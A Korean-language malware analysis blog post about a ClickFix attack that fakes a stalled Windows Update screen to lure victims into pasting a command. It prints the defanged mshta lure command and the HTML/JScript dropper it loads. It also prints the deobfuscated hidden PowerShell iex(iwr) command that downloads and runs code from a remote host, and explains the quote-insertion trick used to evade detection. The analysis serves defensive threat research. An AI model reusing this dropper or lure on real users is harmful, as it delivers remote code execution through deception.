윈도우 업데이트로 위장한 클릭픽스(ClickFix) 공격

오늘은 클릭픽스(ClickFix) 공격 중에서 조금 창의적으로 제작된 공격입니다. 기존의 클릭픽스는 단순하게 너~사람이니 하고 클릭을 하고 나서 cmd 또는 파워셀을 이용을 한 사용자가 복사&붙여 넣기를 통한 악성코드 실행을 하게 한다면 이번에는 컴퓨터 윈도우 업데이트를 하는 블루스크린을 보여주고 나서 윈도우 업데이트 95%에서 멈추는 것 곳에서 사용자가 복사&붙여넣기를 통해서 컴퓨터를 감염하는 방식을 취하고 있습니다.
Working on updates. Please do not turn off your computer.
Part 3 of 3: Check security
95% complete
이라는 부분에서 멈추고 윈도우키+R 버튼 실행에서 복사 붙여넣기 해서 
악성코드 사이트에서 파일을 다운로드 해서 실행을 합니다.
mshta hxxp://141(.)0x62(.)80(.)175/kick(.)dat

윈도우 업데이트로 위장한 클릭픽스

kick(.)dat 에 포함된 내용

<html>
<head>
  <script language="JScript">
    window.onload = function () {
      var shell = new Act??????Object("WScript(.)Shell");

      var cmd = 'POWE?sHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s(.)com)"';

      shell(.)Exec(cmd);

      window(.)close();
    };
  </script>
</head>
<body>
</body>
</html>

분석

kick(.)dat 에 포함된 악성코드 내용

HTML/JS 를 가지고 ActiveX를 통해 PowerShell 명령을 실행하여 원격 코드를 다운로드 하고 iex(Invoke-Expression)로 실행하는 것이 목적이며 
동작
의도된 비난독화)
powershell -WindowStyle Hidden -Command "iex (iwr hxxp://xoiiasdpsdoasdpojas(.)com)
설명:
iwr=Invoke-WebRequest (원격 파일 다운로드)
iex = Invoke-Expression (문자열로 받은 코드를 실행)
-WindowStyle Hidden 은 PowerShell 창을 숨김
문자열 중간에 임의의 따옴표, 대문자, 공백을 넣어 간단한 서명 시그니처 탐지를 회피 목적

악성코드에 포함된 악성코드 다운로드 URL

1.브라우저가 HTML을 로드하면 window.onload 가 실행
2.ActiveXObject("WScript.Shell") 로 WScript.Shell 객체 생성
3.shell.Exec(cmd) 로 PowerShell을 실행하여 원격 URL에 HTTP 요청을 보냄
4. 응답으로 받은 코드를 iex 로 실행->임의 코드 원격 실행(임의 명령 수행)
결론:
HTML/JS는 ActiveXObject(WScript.Shell) 를 생성해 난독화된 PowerShell 명령을 실행하고 나서 원격 HTTP 주소에서 코드를 내려받아 즉시 실행하는 다운로드,실행 드로퍼
일단 웹 소스에 포함된 것이 러시아 어인데…. 기존의 인도에서 미국과 일본을 대상으로 공격하는 윈도우 업데이트 에서 스캠 하는 부분과 비슷한 부분을 가져 와서 클릭픽스(ClickFix) 공격하고 결합을 한 느낌인 것 같습니다.